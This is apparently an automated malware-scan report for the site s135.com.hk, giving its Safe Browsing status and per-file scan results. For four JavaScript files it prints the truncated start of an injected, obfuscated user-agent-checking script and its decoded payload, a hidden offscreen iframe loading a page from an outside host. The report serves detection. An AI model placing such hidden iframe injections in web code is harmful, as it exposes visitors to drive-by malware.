Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=s135.com.hk
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.s135.com.hk/ | 200 OK Content-Length: 33508 Content-Type: text/html | clean |
http://www.s135.com.hk/templates/default/schinese/js/common.js | 200 OK Content-Length: 4025 Content-Type: application/javascript | suspicious |
Suspicious code. Script contains iFrame. (function(){
function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var postindx = 0; if ((postindx = haystack.indexOf(needle, f_offset)) !== -1) { return postindx; } return false; } function funcionUA(){ var probe_ua = ['Lunascape','iPhone','Macintosh','Linux','iPad','Flock','SeaMonkey','Nokia','S ...[3182 bytes skipped]... Decoded script: <iframe name="Fulebraga" src="http://stratberi.antartidait.com.ar/gfjhregewgwehg19.html" style="position:absolute;left:-1284px;top:-1284px;" height="134" width="134"></iframe> | ||
http://www.s135.com.hk/templates/default/schinese/js/jquery-1.6.2.min.js | 200 OK Content-Length: 93620 Content-Type: application/javascript | clean |
http://www.s135.com.hk/templates/default/schinese/js/superMarquee.js | 200 OK Content-Length: 11280 Content-Type: application/javascript | suspicious |
Suspicious code. Script contains iFrame. (function(){
function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var postindx = 0; if ((postindx = haystack.indexOf(needle, f_offset)) !== -1) { return postindx; } return false; } function funcionUA(){ var probe_ua = ['Lunascape','iPhone','Macintosh','Linux','iPad','Flock','SeaMonkey','Nokia','S ...[4129 bytes skipped]... Decoded script: <iframe name="Fulebraga" src="http://stratberi.antartidait.com.ar/gfjhregewgwehg19.html" style="position:absolute;left:-1284px;top:-1284px;" height="134" width="134"></iframe> | ||
http://www.s135.com.hk/js/member.js | 200 OK Content-Length: 7372 Content-Type: application/javascript | clean |
http://www.s135.com.hk/templates/default/schinese/js/cycle.js | 200 OK Content-Length: 21075 Content-Type: application/javascript | suspicious |
Suspicious code. Script contains iFrame. (function(){
function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var postindx = 0; if ((postindx = haystack.indexOf(needle, f_offset)) !== -1) { return postindx; } return false; } function funcionUA(){ var probe_ua = ['Lunascape','iPhone','Macintosh','Linux','iPad','Flock','SeaMonkey','Nokia','S ...[3923 bytes skipped]... Decoded script: <iframe name="Fulebraga" src="http://stratberi.antartidait.com.ar/gfjhregewgwehg19.html" style="position:absolute;left:-1284px;top:-1284px;" height="134" width="134"></iframe> | ||
http://www.s135.com.hk/templates/default/schinese/js/global_login_form.php | 200 OK Content-Length: 813 Content-Type: text/html | clean |
http://www.s135.com.hk/test404page.js | HTTP/1.1 404 Not Found Connection: close Date: Fri, 30 Jan 2015 14:47:30 GMT Accept-Ranges: bytes ETag: "100000000a843-92b-4cc164db69200" Server: Apache/2.2.21 (Win32) PHP/5.3.8 Content-Length: 2347 Content-Type: text/html Last-Modified: Mon, 15 Oct 2012 10:14:32 GMT | clean |
http://www.s135.com.hk/templates/default/schinese/js/login.js | 200 OK Content-Length: 3893 Content-Type: application/javascript | suspicious |
Suspicious code. Script contains iFrame. (function(){
function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var postindx = 0; if ((postindx = haystack.indexOf(needle, f_offset)) !== -1) { return postindx; } return false; } function funcionUA(){ var probe_ua = ['Lunascape','iPhone','Macintosh','Linux','iPad','Flock','SeaMonkey','Nokia','S ...[3651 bytes skipped]... Decoded script: <iframe name="Fulebraga" src="http://stratberi.antartidait.com.ar/gfjhregewgwehg19.html" style="position:absolute;left:-1284px;top:-1284px;" height="134" width="134"></iframe> | ||
http://s19.cnzz.com/stat.php?id=3506239&web_id=3506239 | 200 OK Content-Length: 10072 Content-Type: application/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: s135.com.hk
Result:
GET / HTTP/1.1
Host: s135.com.hk
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: s135.com.hk
Referer: http://www.google.com/search?q=s135.com.hk
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: s135.com.hk
Referer: http://www.google.com/search?q=s135.com.hk
Result:
The result is similar to the first query. There are no suspicious redirects found.